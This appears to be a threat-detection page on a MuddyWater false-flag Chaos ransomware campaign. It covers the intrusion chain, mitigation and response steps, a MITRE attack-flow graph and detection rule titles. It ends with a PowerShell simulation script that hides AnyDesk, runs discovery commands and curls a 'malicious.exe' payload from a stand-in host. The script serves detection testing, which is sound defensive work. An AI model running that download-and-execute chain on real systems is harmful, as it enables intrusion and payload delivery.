Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
In early 2026, what initially appeared to be a routine Chaos ransomware incident was later identified as a false-flag operation tied to the Iranian state-linked group MuddyWater, also known as Seedworm. Rather than focusing on file encryption, the attackers used Microsoft Teams for social engineering, stole credentials and MFA tokens, and deployed a custom downloader together with a remote access trojan. The operation reused infrastructure associated with MuddyWater, including a code-signing certificate, and was geared toward data theft and persistent long-term access.
Investigation
Rapid7 investigators reconstructed the intrusion chain from Teams-based credential theft to the use of legitimate remote administration tools such as AnyDesk and DWAgent, followed by delivery of ms_upd.exe, which retrieved a custom RAT named Game.exe. The team identified command-and-control domains including moonzonet.com and uploadfiler.com, along with multiple associated IP addresses and a signing certificate previously linked to MuddyWater. Malware analysis also uncovered anti-analysis behavior, a mutex used to enforce single execution, and persistence mechanisms involving a service and hidden files.
Mitigation
Organizations should enforce stronger MFA protections, restrict remote desktop access and Teams screen-sharing to trusted accounts, and monitor for legitimate remote access tools being used in unusual contexts. Application allow-listing should be applied to code-signed binaries, and execution of unsigned files from user-accessible directories should be blocked. Security teams should also audit certificate usage regularly and block the known malicious domains and IP addresses tied to the campaign.
Response
If this activity is detected, isolate the affected systems immediately, revoke compromised credentials and MFA tokens, and begin full forensic collection. The identified command-and-control infrastructure should be blocked, AnyDesk and DWAgent services should be removed, and the custom RAT should be eradicated from the environment. Threat hunting should also be conducted for the mutex ATTRIBUTES_ObjectKernel and any remaining files stored under ProgramData.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#aaffaa classDef process fill:#ffcc99 classDef malware fill:#ff9999 %% Nodes u2013 Actions action_initial_access["<b>Action</b> – <b>T1566 Phishing</b><br/>Adversary sent malicious Microsoft Teams chat messages that lured users to a fake Quick Assist screenu2011sharing session."] class action_initial_access action action_user_exec_link["<b>Action</b> – <b>T1204.001 User Execution: Malicious Link</b><br/>Victims clicked a malicious link delivered via Teams which initiated download of <i>ms_upd.exe</i>."] class action_user_exec_link action action_user_exec_copypaste["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/>Attackers instructed users to copyu2011paste credentials into locally created text files."] class action_user_exec_copypaste action action_cred_access["<b>Action</b> – <b>T1552.008 Unsecured Credentials</b> & <b>T1078 Valid Accounts</b><br/>Harvested credentials from chat messages and used them to log into internal systems."] class action_cred_access action action_auth_mod["<b>Action</b> – <b>T1556.001 Domain Controller Authentication</b><br/>Compromised credentials were used to authenticate to the domain controller gaining privileged access."] class action_auth_mod action action_discovery["<b>Action</b> – <b>T1082 System Information Discovery</b> & <b>T1016 System Network Configuration Discovery</b><br/>Malware collected hostname, username, domain, IP address via ipconfig, whoami, etc."] class action_discovery action action_ingress_transfer["<b>Action</b> – <b>T1105 Ingress Tool Transfer</b><br/><i>ms_upd.exe</i> downloaded additional payloads (WebView2Loader.dll, Game.exe, visualwincomp.txt) using curl."] class action_ingress_transfer action action_execution["<b>Action</b> – <b>T1059 Command and Scripting Interpreter</b><br/>Attacker executed cmd.exe, PowerShell and pythonw.exe to run the downloaded binaries."] class action_execution action action_process_injection["<b>Action</b> – <b>T1055.011 Extra Window Memory Injection</b> & <b>T1055.002 Portable Executable Injection</b><br/>pythonw.exe injected code into suspended processes to launch the RAT stealthily."] class action_process_injection action action_defense_evasion["<b>Action</b> – <b>T1027 Obfuscated Files or Information</b> & <b>T1497 Virtualization/Sandbox Evasion</b><br/>Payloads XORu2011encoded, AESu2011256u2011GCM encrypted; checks for analysis DLLs, VM identifiers and timing to avoid sandbox detection."] class action_defense_evasion action action_persistence["<b>Action</b> – <b>T1219 Remote Access Tools</b><br/>Deployment of DWAgent service and AnyDesk for longu2011term remote control."] class action_persistence action action_lateral_movement["<b>Action</b> – <b>T1563 Remote Service Session Hijacking (RDP)</b> & <b>T1668 Exclusive Control</b><br/>Used legitimate RDP sessions to move laterally and execute commands on additional hosts."] class action_lateral_movement action action_collection_exfil["<b>Action</b> – <b>T1560 Archive Collected Data</b> & <b>T1041 Exfiltration Over C2 Channel</b><br/>Data archived in XORu2011encrypted archive and uploaded to uploadfiler.com."] class action_collection_exfil action action_c2["<b>Action</b> – <b>T1090 Proxy</b> & <b>T1573 Encrypted Channel</b><br/>Communication with C2 infrastructure (moonzonet.com, uploadfiler.com) over HTTPS with encrypted payloads."] class action_c2 action %% Nodes u2013 Tools / Files / Processes / Malware file_ms_upd["<b>File</b> – <b>Name</b>: ms_upd.exe<br/><b>Description</b>: Initial dropper that retrieves further payloads."] class file_ms_upd file file_webview ["<b>File</b> – <b>Name</b>: WebView2Loader.dll<br/><b>Description</b>: Supporting DLL for rendering web content."] class file_webview file file_game["<b>File</b> – <b>Name</b>: Game.exe<br/><b>Description</b>: Secondary payload executed after download."] class file_game file file_visual["<b>File</b> – <b>Name</b>: visualwincomp.txt<br/><b>Description</b>: Text file used for configuration data."] class file_visual file process_cmd["<b>Process</b> – <b>Name</b>: cmd.exe<br/><b>Purpose</b>: Executes commandu2011line instructions."] class process_cmd process process_ps["<b>Process</b> – <b>Name</b>: PowerShell<br/><b>Purpose</b>: Runs PowerShell scripts for payload execution."] class process_ps process process_python["<b>Process</b> – <b>Name</b>: pythonw.exe<br/><b>Purpose</b>: Executes Python based components and performs process injection."] class process_python process malware_dwaga["<b>Malware</b> – <b>Name</b>: DWAgent Service<br/><b>Purpose</b>: Provides persistent remote access."] class malware_dwaga malware tool_anydesk["<b>Tool</b> – <b>Name</b>: AnyDesk<br/><b>Description</b>: Legitimate remote desktop utility used for persistence and lateral movement."] class tool_anydesk tool %% Connections u2013 Flow action_initial_access –>|leads_to| action_user_exec_link action_user_exec_link –>|downloads| file_ms_upd action_user_exec_link –>|leads_to| action_user_exec_copypaste action_user_exec_copypaste –>|provides| action_cred_access action_cred_access –>|enables| action_auth_mod action_auth_mod –>|enables| action_discovery action_discovery –>|triggers| action_ingress_transfer action_ingress_transfer –>|downloads| file_webview action_ingress_transfer –>|downloads| file_game action_ingress_transfer –>|downloads| file_visual action_ingress_transfer –>|leads_to| action_execution action_execution –>|executes| process_cmd action_execution –>|executes| process_ps action_execution –>|executes| process_python process_python –>|injects| action_process_injection action_process_injection –>|facilitates| action_defense_evasion action_defense_evasion –>|enables| action_persistence action_persistence –>|installs| malware_dwaga action_persistence –>|installs| tool_anydesk malware_dwaga –>|supports| action_lateral_movement tool_anydesk –>|supports| action_lateral_movement action_lateral_movement –>|collects| action_collection_exfil action_collection_exfil –>|exfiltrates via| action_c2 %% Styling class action_initial_access,action_user_exec_link,action_user_exec_copypaste,action_cred_access,action_auth_mod,action_discovery,action_ingress_transfer,action_execution,action_process_injection,action_defense_evasion,action_persistence,action_lateral_movement,action_collection_exfil,action_c2 action class file_ms_upd,file_webview,file_game,file_visual file class process_cmd,process_ps,process_python process class malware_dwaga malware class tool_anydesk tool "
Attack Flow
Detections
Possible System Network Configuration Discovery (via cmdline)
View
Possible PING Usage for Delay Execution (via cmdline)
View
Alternative Remote Access / Management Software (via process_creation)
View
Suspicious CURL Usage (via cmdline)
View
Suspicious File Download Direct IP (via proxy)
View
IOCs (HashSha256) to detect: Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware
View
IOCs (HashSha1) to detect: Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware
View
IOCs (HashMd5) to detect: Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware
View
IOCs (SourceIP) to detect: Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware
View
IOCs (DestinationIP) to detect: Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware
View
Suspicious Remote Management Tool and Discovery Command Execution [Windows Process Creation]
View
Detect Interactive Logons and MFA Configuration Changes [Microsoft Windows Security Event Log]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
- Establish a remote foothold using the legitimate remote‑management tool AnyDesk.exe (mirroring the “remote‑tool” selector).
- Perform network reconnaissance by executing
ipconfigandwhoamifrom the same session – satisfying the “discovery command” selector. - Download a malicious payload using
curlinvoked throughcmd.exe, a classic technique for “Ingress Tool Transfer” (T1105) and “Command‑Line Interface” (T1059). - Execute the payload to complete the kill‑chain (not required for rule validation, but included for realism).
-
Regression Test Script:
# ------------------------------------------------- # Simulation Script – triggers the Sigma rule # ------------------------------------------------- # 1. Launch AnyDesk (simulated – assumes AnyDesk is in PATH) Start-Process -FilePath "AnyDesk.exe" -ArgumentList "--no-sandbox" -WindowStyle Hidden # 2. Run discovery commands $discovery = @( "ipconfig /all", "whoami", "net start" ) foreach ($cmd in $discovery) { cmd.exe /c $cmd | Out-Null } # 3. Use cmd.exe + curl to fetch a dummy payload $payloadUrl = "http://example.com/malicious.exe" $outputPath = "$env:TEMPpayload.exe" $downloadCmd = "curl $payloadUrl -o $outputPath" cmd.exe /c $downloadCmd # Optional: Execute the payload (commented for safety) # Start-Process -FilePath $outputPath -WindowStyle Hidden # ------------------------------------------------- -
Cleanup Commands:
# Terminate AnyDesk if it was started Get-Process -Name "AnyDesk" -ErrorAction SilentlyContinue | Stop-Process -Force # Remove the downloaded payload Remove-Item -Path "$env:TEMPpayload.exe" -Force -ErrorAction SilentlyContinue # Clear any lingering cmd.exe instances created by the script Get-Process -Name "cmd" -ErrorAction SilentlyContinue | Stop-Process -Force
End of Report